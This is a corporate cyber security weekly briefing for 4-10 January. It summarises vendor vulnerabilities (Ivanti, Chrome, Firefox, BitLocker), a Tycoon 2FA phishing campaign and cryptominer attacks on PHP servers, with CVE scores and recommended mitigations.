Hybrid Cloud
Cyber Security & NaaS
AI & Data
IoT & Connectivity
Business Applications
Intelligent Workplace
Consulting & Professional Services
Small Medium Enterprise
Health and Social Care
Industry
Retail
Tourism and Leisure
Transport & Logistics
Energy & Utilities
Cyber Security Weekly Briefing, 4-10 January
Ivanti warns of two vulnerabilities in Connect Secure and other products, one under active exploitation
Software vendor Ivanti has warned of two critical vulnerabilities in its products, identified as CVE-2025-0282 and CVE-2025-0283.
- The first, with a CVSSv3 score of 9.0, allows unauthenticated remote attackers to execute arbitrary code via a stack-based buffer overflow and affects several versions of Ivanti Connect Secure, Policy Secure and Neurons for ZTA Gateways.
- The second, with a CVSSv3 score of 7.0, allows authenticated local attackers to escalate privileges.
Mandiant research identified active exploitation of CVE-2025-0282 as of mid-December 2024. Ivanti confirmed that this vulnerability has already been exploited in Connect Secure devices, although it claims no evidence of exploitation in Policy Secure or ZTA.
To mitigate risks, Ivanti recommends using its Integrity Checker Tool (ICT) to detect compromises, upgrade to version 22.7R2.5 and scan with ICT. It also suggests, as a precautionary measure, performing a factory reset before implementing the upgrade.
Chrome and Firefox updates
Google and Mozilla have released security updates for their Chrome and Firefox browsers to address several high security vulnerabilities.
- Google has released Chrome 131, an update that fixes four vulnerabilities including VE-2025-0291 (CVSSv3 8.3), a type confusion vulnerability in the V8 JavaScript engine that could allow an attacker to remotely execute arbitrary code.
- Firefox 134 fixes 11 vulnerabilities, three of which are high severity. The most important is CVE-2025-0247 (CVSSv3 8.8), a memory corruption issue that could be exploited to execute arbitrary code.
It should be noted that neither Google nor Mozilla have seen active exploitation of these vulnerabilities.
Windows 11 encryption can be bypassed through an old Bitlocker vulnerability
Security researcher Thomas Lambertz showed at the Chaos Communication Congress that the BitLocker vulnerability popularly known as bitpixie (CVE-2023-21563, CVSSv3 6.8 according to Microsoft) can still be exploited even though the company released a patch in January 2023.
Lambertz demonstrated how it is possible to bypass BitLocker encryption in Windows 11 without physically opening the PC. The attack exploits an outdated boot loader via Secure Boot, which allows attackers to extract the encryption keys. All that is required is temporary physical access to the device and a network connection.
To mitigate the risk, it is recommended to set custom PIN passwords for BitLocker or disable network access through the BIOS. However, even a USB device connected to the network could facilitate the attack.
New Tycoon 2FA phishing campaign using fake voicemail messages
Researchers at Validin have identified a new method by which the Phishing-as-a-Service (PhaaS) Tycoon 2FA platform enables cybercriminals to launch phishing attacks targeting two-factor authentication (2FA).
The platform, which already enables the creation of custom templates that mimic legitimate 2FA requests and automates the management of large-scale phishing campaigns, is being used to deploy phishing campaigns in which an HTML file is distributed with a fake voicemail page before redirecting to a fake Outlook authentication page.
Static analysis shows variables to store the victim's email and a Base64-encoded blob, which contains HTML code from the fake page and a JavaScript script downloaded after four seconds from a remote URL. It is precisely this script that executes malicious actions after decryption using AES.
The Validin team's research has identified that the PHP file res444.php used in this campaign is also used on several other domains, suggesting a currently active shared infrastructure to take action on.
Malicious actors target PHP servers with cryptominers
SANS researchers have detected a URL that would target vulnerable PHP servers, potentially exploiting the CVE-2024-4577 (CVSSv3 9.8) flaw or misconfigurations that allow public access to “php-cgi.exe” by executing multiple commands via the system() function. It downloads a malicious executable, named “dr0p.exe”, from a remote server to run locally, and attempts to download the same executable using wget, bypassing SSL certificate verification.
This server would be based in the US and would host EvilBit Block Explorer on port 80, in addition to exposing ports 22, 110 and 6664. Also, the analysis revealed that the malware launches packetcrypt.exe, which likely corresponds to a cryptocurrency miner, while providing a PKT Classic wallet address as a storyline.
SANS research revealed that the cryptocurrency mined on the compromised PHP servers was PKTC, a proof-of-work coin inherited from the PacketCrypt project.
◾ This newsletter is one of the deliverables of our Operational and Strategic Intelligence service. If you are interested in knowing the rest of the Operational and Strategic Intelligence contents included in the service, please contact us →
